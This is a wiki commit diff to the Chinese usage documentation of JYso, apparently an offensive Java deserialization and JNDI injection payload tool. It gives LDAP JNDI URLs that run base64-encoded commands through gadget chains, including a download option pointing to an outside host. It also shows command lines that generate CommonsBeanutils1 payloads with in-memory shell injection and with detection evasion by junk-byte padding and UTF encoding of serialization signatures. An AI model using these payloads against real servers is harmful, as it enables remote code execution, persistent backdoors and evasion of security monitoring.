Updated JYso‐CN (markdown)

炁
2024-03-20 10:02:47 +08:00
parent 680d2b6f4a
commit e2179597bc
+8 -7
@@ -135,11 +135,6 @@ http://127.0.0.1:3456/setRoute?a=Deserialization/CommonsCollections6/command/Bas
![](https://gallery-1304405887.cos.ap-nanjing.myqcloud.com/markdown%E5%BE%AE%E4%BF%A1%E6%88%AA%E5%9B%BE_20230706103914.png)
+ 直接命令执行示例:
```
ldap://127.0.0.1:1389/[Basic or TomcatBypass]/command/Base64/[base64_encoded_cmd]
```
# 1.2 Echo使用
- 命令 `AllEcho`:DFS 找 Request 命令执行回显
@@ -493,7 +488,7 @@ base64 编码</font>。
**命令执行示例**:
jdni中同理
**JNDI中同理**
```java
ldap://127.0.0.1:1389/Deserialization/CommonsCollections1/command/Base64/[base64_encoded_DL-xxx.org])
@@ -586,7 +581,7 @@ java -jar JYso-[version].jar -y -g CommonsCollections3 -p LF-/tmp/evil.class
示例:`all:xxx.dns.log`
Base64编码all:dnslog地址,即可
```shell
java -jar JYso-[version].jar -y -g URLDNS -p 'all:xxx.dns.log'
```
@@ -624,6 +619,12 @@ ldap://127.0.0.1:1389/Deserialization/URLDNS/command/Base64/[base64_encoded_all:
java -jar JYso-[version].jar -y -g CommonsBeanutils1 -p 'EX-MS-TEXMSFromThread' -dt 1 -dl 50000
```
通过UTF编码对原始序列化数据中 TC_CLASSDESC、TC_PROXYCLASSDESC、TC_STRING 这些强特征来3字节加密
```shell
java -jar JYso-[version].jar -y -g CommonsBeanutils1 -p 'EX-MS-TEXMSFromThread' -utf
```
可以生成填充了 50000 个脏字符的序列化数据
# 2.0 RASP 层面